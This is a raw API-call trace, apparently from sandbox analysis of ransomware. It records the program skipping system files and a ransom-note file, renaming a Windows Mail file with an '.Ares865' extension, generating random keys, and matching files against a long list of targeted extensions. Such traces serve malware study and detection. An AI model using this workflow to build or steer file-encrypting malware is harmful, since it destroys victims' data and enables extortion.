(lpString1="oeold.xml", lpString2=".lnk") returned 1 [0041.825] lstrlenW (lpString=".ini") returned 4 [0041.825] lstrcmpiW (lpString1="oeold.xml", lpString2=".ini") returned 1 [0041.825] lstrlenW (lpString=".sys") returned 4 [0041.825] lstrcmpiW (lpString1="oeold.xml", lpString2=".sys") returned 1 [0041.825] lstrlenW (lpString="oeold.xml") returned 9 [0041.825] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\oeold.xml.Ares865") returned 77 [0041.825] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\oeold.xml.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\oeold.xml.ares865"), dwFlags=0x1) returned 1 [0041.825] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\oeold.xml.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\oeold.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0041.826] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=260) returned 1 [0041.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0041.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0041.826] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0041.826] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0041.827] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0041.827] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0041.827] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x410, lpName=0x0) returned 0x160 [0041.829] MapViewOfFile (hFileMappingObject=0x160, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x410) returned 0x190000 [0041.830] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0041.831] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0041.831] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0041.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb400 [0041.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb400 [0041.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0041.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb400 | out: hHeap=0x2b0000) returned 1 [0041.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0041.831] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cba28 [0041.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0041.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cba28 | out: hHeap=0x2b0000) returned 1 [0041.831] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0041.831] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0041.831] CloseHandle (hObject=0x160) returned 1 [0041.832] CloseHandle (hObject=0x154) returned 1 [0041.833] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0041.833] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0041.833] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0041.833] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x650f7e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf690d5d8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Stationery", cAlternateFileName="STATIO~1")) returned 1 [0041.833] lstrcmpiW (lpString1="Stationery", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.833] lstrcmpiW (lpString1="Stationery", lpString2="aoldtz.exe") returned 1 [0041.833] lstrcmpiW (lpString1="Stationery", lpString2=".") returned 1 [0041.833] lstrcmpiW (lpString1="Stationery", lpString2="..") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="windows") returned -1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="bootmgr") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="temp") returned -1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="pagefile.sys") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="boot") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="ids.txt") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="ntuser.dat") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="perflogs") returned 1 [0041.834] lstrcmpiW (lpString1="Stationery", lpString2="MSBuild") returned 1 [0041.834] lstrlenW (lpString="Stationery") returned 10 [0041.834] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\oeold.xml") returned 69 [0041.834] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="Stationery" | out: lpString1="Stationery") returned="Stationery" [0041.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0041.834] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x2d1ea0 [0041.834] RtlInterlockedPushEntrySList (in: ListHead=0x2e77d0, ListEntry=0x2d2448 | out: ListHead=0x2e77d0, ListEntry=0x2d2448) returned 0x2d2428 [0041.834] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6451100, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd7b05332, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x204000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsMail.MSMessageStore", cAlternateFileName="WINDOW~1.MSM")) returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="aoldtz.exe") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="..") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="windows") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="bootmgr") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="temp") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="pagefile.sys") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="boot") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="ids.txt") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="ntuser.dat") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="perflogs") returned 1 [0041.834] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2="MSBuild") returned 1 [0041.834] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0041.834] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned 70 [0041.834] lstrcpyW (in: lpString1=0x2e2e8d8, lpString2="WindowsMail.MSMessageStore" | out: lpString1="WindowsMail.MSMessageStore") returned="WindowsMail.MSMessageStore" [0041.834] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0041.835] lstrlenW (lpString="Ares865") returned 7 [0041.835] lstrcmpiW (lpString1="geStore", lpString2="Ares865") returned 1 [0041.835] lstrlenW (lpString=".dll") returned 4 [0041.835] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".dll") returned 1 [0041.835] lstrlenW (lpString=".lnk") returned 4 [0041.835] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".lnk") returned 1 [0041.835] lstrlenW (lpString=".ini") returned 4 [0041.835] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".ini") returned 1 [0041.835] lstrlenW (lpString=".sys") returned 4 [0041.835] lstrcmpiW (lpString1="WindowsMail.MSMessageStore", lpString2=".sys") returned 1 [0041.835] lstrlenW (lpString="WindowsMail.MSMessageStore") returned 26 [0041.835] lstrlenW (lpString="bak") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="bak") returned 1 [0041.835] lstrlenW (lpString="ba_") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="ba_") returned 1 [0041.835] lstrlenW (lpString="dbb") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="dbb") returned 1 [0041.835] lstrlenW (lpString="vmdk") returned 4 [0041.835] lstrcmpiW (lpString1="tore", lpString2="vmdk") returned -1 [0041.835] lstrlenW (lpString="rar") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="rar") returned -1 [0041.835] lstrlenW (lpString="zip") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="zip") returned -1 [0041.835] lstrlenW (lpString="tgz") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="tgz") returned -1 [0041.835] lstrlenW (lpString="vbox") returned 4 [0041.835] lstrcmpiW (lpString1="tore", lpString2="vbox") returned -1 [0041.835] lstrlenW (lpString="vdi") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="vdi") returned -1 [0041.835] lstrlenW (lpString="vhd") returned 3 [0041.835] lstrcmpiW (lpString1="ore", lpString2="vhd") returned -1 [0041.835] lstrlenW (lpString="vhdx") returned 4 [0041.835] lstrcmpiW (lpString1="tore", lpString2="vhdx") returned -1 [0041.835] lstrlenW (lpString="avhd") returned 4 [0041.836] lstrcmpiW (lpString1="tore", lpString2="avhd") returned 1 [0041.836] lstrlenW (lpString="db") returned 2 [0041.836] lstrcmpiW (lpString1="re", lpString2="db") returned 1 [0041.836] lstrlenW (lpString="db2") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="db2") returned 1 [0041.836] lstrlenW (lpString="db3") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="db3") returned 1 [0041.836] lstrlenW (lpString="dbf") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="dbf") returned 1 [0041.836] lstrlenW (lpString="mdf") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="mdf") returned 1 [0041.836] lstrlenW (lpString="mdb") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="mdb") returned 1 [0041.836] lstrlenW (lpString="sql") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="sql") returned -1 [0041.836] lstrlenW (lpString="sqlite") returned 6 [0041.836] lstrcmpiW (lpString1="eStore", lpString2="sqlite") returned -1 [0041.836] lstrlenW (lpString="sqlite3") returned 7 [0041.836] lstrcmpiW (lpString1="geStore", lpString2="sqlite3") returned -1 [0041.836] lstrlenW (lpString="sqlitedb") returned 8 [0041.836] lstrcmpiW (lpString1="ageStore", lpString2="sqlitedb") returned -1 [0041.836] lstrlenW (lpString="xml") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="xml") returned -1 [0041.836] lstrlenW (lpString="$er") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="$er") returned 1 [0041.836] lstrlenW (lpString="4dd") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="4dd") returned 1 [0041.836] lstrlenW (lpString="4dl") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="4dl") returned 1 [0041.836] lstrlenW (lpString="^^^") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="^^^") returned 1 [0041.836] lstrlenW (lpString="abs") returned 3 [0041.836] lstrcmpiW (lpString1="ore", lpString2="abs") returned 1 [0041.836] lstrlenW (lpString="abx") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="abx") returned 1 [0041.837] lstrlenW (lpString="accdb") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accdb") returned 1 [0041.837] lstrlenW (lpString="accdc") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accdc") returned 1 [0041.837] lstrlenW (lpString="accde") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accde") returned 1 [0041.837] lstrlenW (lpString="accdr") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accdr") returned 1 [0041.837] lstrlenW (lpString="accdt") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accdt") returned 1 [0041.837] lstrlenW (lpString="accdw") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accdw") returned 1 [0041.837] lstrlenW (lpString="accft") returned 5 [0041.837] lstrcmpiW (lpString1="Store", lpString2="accft") returned 1 [0041.837] lstrlenW (lpString="adb") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="adb") returned 1 [0041.837] lstrlenW (lpString="adb") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="adb") returned 1 [0041.837] lstrlenW (lpString="ade") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="ade") returned 1 [0041.837] lstrlenW (lpString="adf") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="adf") returned 1 [0041.837] lstrlenW (lpString="adn") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="adn") returned 1 [0041.837] lstrlenW (lpString="adp") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="adp") returned 1 [0041.837] lstrlenW (lpString="alf") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="alf") returned 1 [0041.837] lstrlenW (lpString="ask") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="ask") returned 1 [0041.837] lstrlenW (lpString="btr") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="btr") returned 1 [0041.837] lstrlenW (lpString="cat") returned 3 [0041.837] lstrcmpiW (lpString1="ore", lpString2="cat") returned 1 [0041.837] lstrlenW (lpString="cdb") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="cdb") returned 1 [0041.838] lstrlenW (lpString="ckp") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="ckp") returned 1 [0041.838] lstrlenW (lpString="cma") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="cma") returned 1 [0041.838] lstrlenW (lpString="cpd") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="cpd") returned 1 [0041.838] lstrlenW (lpString="dacpac") returned 6 [0041.838] lstrcmpiW (lpString1="eStore", lpString2="dacpac") returned 1 [0041.838] lstrlenW (lpString="dad") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dad") returned 1 [0041.838] lstrlenW (lpString="dadiagrams") returned 10 [0041.838] lstrcmpiW (lpString1="ssageStore", lpString2="dadiagrams") returned 1 [0041.838] lstrlenW (lpString="daschema") returned 8 [0041.838] lstrcmpiW (lpString1="ageStore", lpString2="daschema") returned -1 [0041.838] lstrlenW (lpString="db-journal") returned 10 [0041.838] lstrcmpiW (lpString1="ssageStore", lpString2="db-journal") returned 1 [0041.838] lstrlenW (lpString="db-shm") returned 6 [0041.838] lstrcmpiW (lpString1="eStore", lpString2="db-shm") returned 1 [0041.838] lstrlenW (lpString="db-wal") returned 6 [0041.838] lstrcmpiW (lpString1="eStore", lpString2="db-wal") returned 1 [0041.838] lstrlenW (lpString="dbc") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dbc") returned 1 [0041.838] lstrlenW (lpString="dbs") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dbs") returned 1 [0041.838] lstrlenW (lpString="dbt") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dbt") returned 1 [0041.838] lstrlenW (lpString="dbv") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dbv") returned 1 [0041.838] lstrlenW (lpString="dbx") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dbx") returned 1 [0041.838] lstrlenW (lpString="dcb") returned 3 [0041.838] lstrcmpiW (lpString1="ore", lpString2="dcb") returned 1 [0041.838] lstrlenW (lpString="dct") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dct") returned 1 [0041.839] lstrlenW (lpString="dcx") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dcx") returned 1 [0041.839] lstrlenW (lpString="ddl") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="ddl") returned 1 [0041.839] lstrlenW (lpString="dlis") returned 4 [0041.839] lstrcmpiW (lpString1="tore", lpString2="dlis") returned 1 [0041.839] lstrlenW (lpString="dp1") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dp1") returned 1 [0041.839] lstrlenW (lpString="dqy") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dqy") returned 1 [0041.839] lstrlenW (lpString="dsk") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dsk") returned 1 [0041.839] lstrlenW (lpString="dsn") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dsn") returned 1 [0041.839] lstrlenW (lpString="dtsx") returned 4 [0041.839] lstrcmpiW (lpString1="tore", lpString2="dtsx") returned 1 [0041.839] lstrlenW (lpString="dxl") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="dxl") returned 1 [0041.839] lstrlenW (lpString="eco") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="eco") returned 1 [0041.839] lstrlenW (lpString="ecx") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="ecx") returned 1 [0041.839] lstrlenW (lpString="edb") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="edb") returned 1 [0041.839] lstrlenW (lpString="epim") returned 4 [0041.839] lstrcmpiW (lpString1="tore", lpString2="epim") returned 1 [0041.839] lstrlenW (lpString="fcd") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="fcd") returned 1 [0041.839] lstrlenW (lpString="fdb") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="fdb") returned 1 [0041.839] lstrlenW (lpString="fic") returned 3 [0041.839] lstrcmpiW (lpString1="ore", lpString2="fic") returned 1 [0041.839] lstrlenW (lpString="flexolibrary") returned 12 [0041.840] lstrcmpiW (lpString1="MessageStore", lpString2="flexolibrary") returned 1 [0041.840] lstrlenW (lpString="fm5") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fm5") returned 1 [0041.840] lstrlenW (lpString="fmp") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fmp") returned 1 [0041.840] lstrlenW (lpString="fmp12") returned 5 [0041.840] lstrcmpiW (lpString1="Store", lpString2="fmp12") returned 1 [0041.840] lstrlenW (lpString="fmpsl") returned 5 [0041.840] lstrcmpiW (lpString1="Store", lpString2="fmpsl") returned 1 [0041.840] lstrlenW (lpString="fol") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fol") returned 1 [0041.840] lstrlenW (lpString="fp3") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fp3") returned 1 [0041.840] lstrlenW (lpString="fp4") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fp4") returned 1 [0041.840] lstrlenW (lpString="fp5") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fp5") returned 1 [0041.840] lstrlenW (lpString="fp7") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fp7") returned 1 [0041.840] lstrlenW (lpString="fpt") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="fpt") returned 1 [0041.840] lstrlenW (lpString="frm") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="frm") returned 1 [0041.840] lstrlenW (lpString="gdb") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="gdb") returned 1 [0041.840] lstrlenW (lpString="gdb") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="gdb") returned 1 [0041.840] lstrlenW (lpString="grdb") returned 4 [0041.840] lstrcmpiW (lpString1="tore", lpString2="grdb") returned 1 [0041.840] lstrlenW (lpString="gwi") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="gwi") returned 1 [0041.840] lstrlenW (lpString="hdb") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="hdb") returned 1 [0041.840] lstrlenW (lpString="his") returned 3 [0041.840] lstrcmpiW (lpString1="ore", lpString2="his") returned 1 [0041.841] lstrlenW (lpString="ib") returned 2 [0041.841] lstrcmpiW (lpString1="re", lpString2="ib") returned 1 [0041.841] lstrlenW (lpString="idb") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="idb") returned 1 [0041.841] lstrlenW (lpString="ihx") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="ihx") returned 1 [0041.841] lstrlenW (lpString="itdb") returned 4 [0041.841] lstrcmpiW (lpString1="tore", lpString2="itdb") returned 1 [0041.841] lstrlenW (lpString="itw") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="itw") returned 1 [0041.841] lstrlenW (lpString="jet") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="jet") returned 1 [0041.841] lstrlenW (lpString="jtx") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="jtx") returned 1 [0041.841] lstrlenW (lpString="kdb") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="kdb") returned 1 [0041.841] lstrlenW (lpString="kexi") returned 4 [0041.841] lstrcmpiW (lpString1="tore", lpString2="kexi") returned 1 [0041.841] lstrlenW (lpString="kexic") returned 5 [0041.841] lstrcmpiW (lpString1="Store", lpString2="kexic") returned 1 [0041.841] lstrlenW (lpString="kexis") returned 5 [0041.841] lstrcmpiW (lpString1="Store", lpString2="kexis") returned 1 [0041.841] lstrlenW (lpString="lgc") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="lgc") returned 1 [0041.841] lstrlenW (lpString="lwx") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="lwx") returned 1 [0041.841] lstrlenW (lpString="maf") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="maf") returned 1 [0041.841] lstrlenW (lpString="maq") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="maq") returned 1 [0041.841] lstrlenW (lpString="mar") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="mar") returned 1 [0041.841] lstrlenW (lpString="marshal") returned 7 [0041.841] lstrcmpiW (lpString1="geStore", lpString2="marshal") returned -1 [0041.841] lstrlenW (lpString="mas") returned 3 [0041.841] lstrcmpiW (lpString1="ore", lpString2="mas") returned 1 [0041.842] lstrlenW (lpString="mav") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mav") returned 1 [0041.842] lstrlenW (lpString="maw") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="maw") returned 1 [0041.842] lstrlenW (lpString="mdbhtml") returned 7 [0041.842] lstrcmpiW (lpString1="geStore", lpString2="mdbhtml") returned -1 [0041.842] lstrlenW (lpString="mdn") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mdn") returned 1 [0041.842] lstrlenW (lpString="mdt") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mdt") returned 1 [0041.842] lstrlenW (lpString="mfd") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mfd") returned 1 [0041.842] lstrlenW (lpString="mpd") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mpd") returned 1 [0041.842] lstrlenW (lpString="mrg") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mrg") returned 1 [0041.842] lstrlenW (lpString="mud") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mud") returned 1 [0041.842] lstrlenW (lpString="mwb") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="mwb") returned 1 [0041.842] lstrlenW (lpString="myd") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="myd") returned 1 [0041.842] lstrlenW (lpString="ndf") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="ndf") returned 1 [0041.842] lstrlenW (lpString="nnt") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="nnt") returned 1 [0041.842] lstrlenW (lpString="nrmlib") returned 6 [0041.842] lstrcmpiW (lpString1="eStore", lpString2="nrmlib") returned -1 [0041.842] lstrlenW (lpString="ns2") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="ns2") returned 1 [0041.842] lstrlenW (lpString="ns3") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="ns3") returned 1 [0041.842] lstrlenW (lpString="ns4") returned 3 [0041.842] lstrcmpiW (lpString1="ore", lpString2="ns4") returned 1 [0041.843] lstrlenW (lpString="nsf") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="nsf") returned 1 [0041.843] lstrlenW (lpString="nv") returned 2 [0041.843] lstrcmpiW (lpString1="re", lpString2="nv") returned 1 [0041.843] lstrlenW (lpString="nv2") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="nv2") returned 1 [0041.843] lstrlenW (lpString="nwdb") returned 4 [0041.843] lstrcmpiW (lpString1="tore", lpString2="nwdb") returned 1 [0041.843] lstrlenW (lpString="nyf") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="nyf") returned 1 [0041.843] lstrlenW (lpString="odb") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="odb") returned 1 [0041.843] lstrlenW (lpString="odb") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="odb") returned 1 [0041.843] lstrlenW (lpString="oqy") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="oqy") returned 1 [0041.843] lstrlenW (lpString="ora") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="ora") returned 1 [0041.843] lstrlenW (lpString="orx") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="orx") returned -1 [0041.843] lstrlenW (lpString="owc") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="owc") returned -1 [0041.843] lstrlenW (lpString="p96") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="p96") returned -1 [0041.843] lstrlenW (lpString="p97") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="p97") returned -1 [0041.843] lstrlenW (lpString="pan") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="pan") returned -1 [0041.843] lstrlenW (lpString="pdb") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="pdb") returned -1 [0041.843] lstrlenW (lpString="pdm") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="pdm") returned -1 [0041.843] lstrlenW (lpString="pnz") returned 3 [0041.843] lstrcmpiW (lpString1="ore", lpString2="pnz") returned -1 [0041.843] lstrlenW (lpString="qry") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="qry") returned -1 [0041.844] lstrlenW (lpString="qvd") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="qvd") returned -1 [0041.844] lstrlenW (lpString="rbf") returned 3 [0041.844] lstrcmpiW (lpString1="ore", lpString2="rbf") returned -1 [0041.844] lstrlenW (lpString="rctd") returned 4 